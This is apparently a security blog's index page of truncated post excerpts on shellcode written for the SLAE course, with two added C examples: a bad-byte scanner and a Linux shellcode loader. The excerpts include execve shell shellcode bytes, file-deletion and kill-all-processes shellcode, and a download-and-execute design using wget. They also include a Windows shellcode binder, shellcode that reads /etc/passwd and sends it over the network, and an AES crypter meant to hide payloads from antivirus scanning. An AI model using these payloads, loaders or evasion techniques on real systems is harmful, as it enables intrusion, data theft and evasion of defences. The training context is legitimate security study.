-
Null-Free Windows WinExec Shellcode & Tool for Generating Payload
Shellcode: Here is a shellcode that might run on most Windows machines. I adapted code from here: http://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html, so thanks to the author of that shellcode. Instead of CreateProcessA, this version calls WinExec. ; Filename: winexec.asm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/ ; License: http://creativecommons.org/licenses/by-sa/3.0/ BITS 32 global _start _start: xor ebx,…
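The check a practitioner wants before dropping a payload like this into an exploit is that it really contains no 0x00 (or whatever other bytes the target's input path rejects). The scanner below is an added example written for this page, not code from the original post. It takes the forbidden set as a parameter so the same routine covers any bad-character list, and it uses two inputs: the 25-byte execve("/bin//sh") shellcode quoted further down this page, and a constructed five-byte `mov eax, 42` whose 32-bit immediate brings three null bytes with it.

```c
/* Added example, not part of the original post: scan a payload for bytes
 * that must not appear in it. Null-free shellcode is the common case, but
 * the same check applies to any bad-character set (0x0a/0x0d for
 * line-based input, 0x20 for space-split parsers, ...). */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* One forbidden byte found in the payload. */
struct badchar_hit {
    size_t offset;
    unsigned char value;
};

/* Scan payload[0..len) for any byte listed in bad[0..nbad). Up to max_hits
 * hits are written to out; the return value is the total number of
 * forbidden bytes found, which may exceed max_hits (out may be NULL when
 * max_hits is 0). */
size_t find_bad_chars(const unsigned char *payload, size_t len,
                      const unsigned char *bad, size_t nbad,
                      struct badchar_hit *out, size_t max_hits)
{
    unsigned char forbidden[256] = {0};
    size_t hits = 0;

    for (size_t i = 0; i < nbad; i++)
        forbidden[bad[i]] = 1;

    for (size_t i = 0; i < len; i++) {
        if (!forbidden[payload[i]])
            continue;
        if (hits < max_hits) {
            out[hits].offset = i;
            out[hits].value = payload[i];
        }
        hits++;
    }
    return hits;
}

/* Convenience wrapper for the common question: is the payload null-free? */
int is_null_free(const unsigned char *payload, size_t len)
{
    unsigned char nul = 0x00;
    return find_bad_chars(payload, len, &nul, 1, NULL, 0) == 0;
}

/* The 25-byte execve("/bin//sh") shellcode quoted later on this page.
 * Note the string literal adds a trailing 0x00, so always pass
 * sizeof(x) - 1, otherwise the terminator is reported as a hit. */
static const unsigned char execve_sh[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    "\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

/* Constructed counter-example: "mov eax, 42" encodes the immediate as a
 * 32-bit little-endian value, so three of its five bytes are 0x00.
 * "xor eax,eax ; mov al,42" (31 c0 b0 2a) does the same job null-free. */
static const unsigned char mov_eax_42[] = "\xb8\x2a\x00\x00\x00";

int main(void)
{
    struct badchar_hit hits[8];
    unsigned char nul = 0x00;
    size_t n;

    printf("execve shellcode null-free: %s\n",
           is_null_free(execve_sh, sizeof(execve_sh) - 1) ? "yes" : "no");

    n = find_bad_chars(mov_eax_42, sizeof(mov_eax_42) - 1, &nul, 1, hits, 8);
    printf("mov eax,42: %zu null byte(s)\n", n);
    for (size_t i = 0; i < n && i < 8; i++)
        printf("  offset %zu: 0x%02x\n", hits[i].offset, hits[i].value);
    return 0;
}
```

The lookup table makes the scan linear in the payload length regardless of how many bytes are forbidden, and the hit list gives the offsets you need to go back to the assembler listing and replace the offending instruction.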
-
Deepsec 2014: Why Antivirus Software fails
Here are the slides from my talk at the Deepsec 2014 conference: https://deepsec.net/docs/Slides/2014/Why_Antivirus_Fails_-_Daniel_Sauder.pdf
-
Shellcode Binder for Windows 64-Bit
I did not find a shellcode binder for Windows 64-bit systems, so here is my version: #include <windows.h> unsigned char sc[] = // your shellcode here typedef void (*FUNCPTR)(); int main(int argc, char **argv) { FUNCPTR func; int len; DWORD oldProtect; len = sizeof(sc); if (0 == VirtualProtect(&sc, len, PAGE_EXECUTE_READWRITE, &oldProtect)) return 1; func…
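As an added example (not from the original post), here is the Linux counterpart of the binder above, assuming an x86, x86-64 or arm64 Linux host and a gcc or clang toolchain. Where the Windows version changes the protection of the data array in place with VirtualProtect, this one maps a fresh page, writes the payload, then drops write permission before executing it, so no mapping is ever writable and executable at the same time. The embedded payloads are constructed for the example and simply return 42, which lets the call be checked instead of spawning anything.

```c
/* Added example, not part of the original post: a Linux shellcode binder.
 * mmap RW -> copy payload -> mprotect RX -> call through a function pointer. */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed test payload that behaves like "return 42" and is null-free.
 * The bytes are selected by the build target; a real payload would be
 * pasted here the same way the Windows binder expects it in sc[]. */
#if defined(__x86_64__) || defined(__i386__)
/* xor eax,eax ; mov al,42 ; ret */
static const unsigned char sc[] = { 0x31, 0xc0, 0xb0, 0x2a, 0xc3 };
#elif defined(__aarch64__)
/* mov w0,#42 ; ret */
static const unsigned char sc[] = { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 };
#else
#error "no test payload for this architecture"
#endif

typedef int (*payload_fn)(void);

/* Copy len bytes of code into executable memory and run it. Returns the
 * payload's return value, or -1 if the mapping could not be set up. */
int run_shellcode(const unsigned char *code, size_t len)
{
    size_t pagesz = (size_t)sysconf(_SC_PAGESIZE);
    size_t maplen = ((len + pagesz - 1) / pagesz) * pagesz;

    /* Start read+write only: write the payload, then take write away. */
    void *mem = mmap(NULL, maplen, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return -1;
    memcpy(mem, code, len);

    /* W^X: the page is executable only after it stops being writable.
     * This is also where an execmem-style policy (e.g. SELinux) says no. */
    if (mprotect(mem, maplen, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, maplen);
        return -1;
    }

    /* Needed on arm64, whose instruction cache is separate from the data
     * cache the memcpy went through; a no-op on x86. */
    __builtin___clear_cache((char *)mem, (char *)mem + len);

    payload_fn fn;
    memcpy(&fn, &mem, sizeof fn);   /* object pointer -> function pointer without a cast */
    int rc = fn();

    munmap(mem, maplen);
    return rc;
}

int main(void)
{
    printf("payload returned %d\n", run_shellcode(sc, sizeof sc));
    return 0;
}
```

Build with `cc loader.c -o loader` and run it. If `mprotect` fails with EACCES, the host forbids executable anonymous memory (an SELinux execmem policy or similar), which is the same hurdle a real payload delivered this way would hit, so it is worth knowing before a test.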
-
Useful Add-ons for Web Application Pentesting
So here is just a very short one. Every time I set up a new pentest machine I have to look this up again, so here is a small list of browser add-ons that are useful for web-app pentesting: Wappalyzer, Hackbar, Firebug, FoxyProxy, Export Cookies, ProfileSwitcher, Web Developer Toolbar, GroundSpeed, Tamper Data, ImmuniWeb
-
Article about Antivirus Evasion
Check out my article about antivirus evasion here.
-
Shellcode for deleting a file
Just a short one here. This shellcode simply deletes a file with the name x. Have fun. deletefile.nasm ; Filename: deletefile.nasm ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com ; Tested on: Ubuntu 12.04 / 32-bit ; License http://creativecommons.org/licenses/by-sa/3.0/ ; delete file with name x section .text global _start _start: push 0x78 ; push x, filename…
-
Writing a download and exec shellcode
After completing the tasks for the SLAE certification, I went on to write a shellcode for downloading and executing a file. For this task I want to use wget with execve. But first, some pseudocode: start; execve wget file_x; chmod +x file_x; execve file_x; end. So that is the plan. See a problem here? Look at the…
-
SLAE: Shellcode read and send file
Because it is so much fun, I developed a shellcode that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. And here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: https://govolution.wordpress.com/about ; License http://creativecommons.org/licenses/by-sa/3.0/ ; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. ; The file can be…
-
SLAE Assignment 7: Crypter
This is the last one and it is about writing a crypter/decrypter. I used Python and PyCrypto for this task. The execve shellcode starts a shell. The scripts use AES in CBC mode for encryption and decryption, with the 16-byte key and IV written as literals in the script (so this hides the payload from static scanning, not from anyone who holds the script). Here is the code for encryption: encode.py from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345') l=len(plain) r=l%16 p=16-r print "offset: "…
-
SLAE Assignment 6: Polymorphic Shellcode
This assignment is about writing polymorphic versions of shellcodes taken from shell-storm.org. Kill All Processes Shellcode: I want to start with a simple one, a shellcode that kills all processes, which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php. Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax…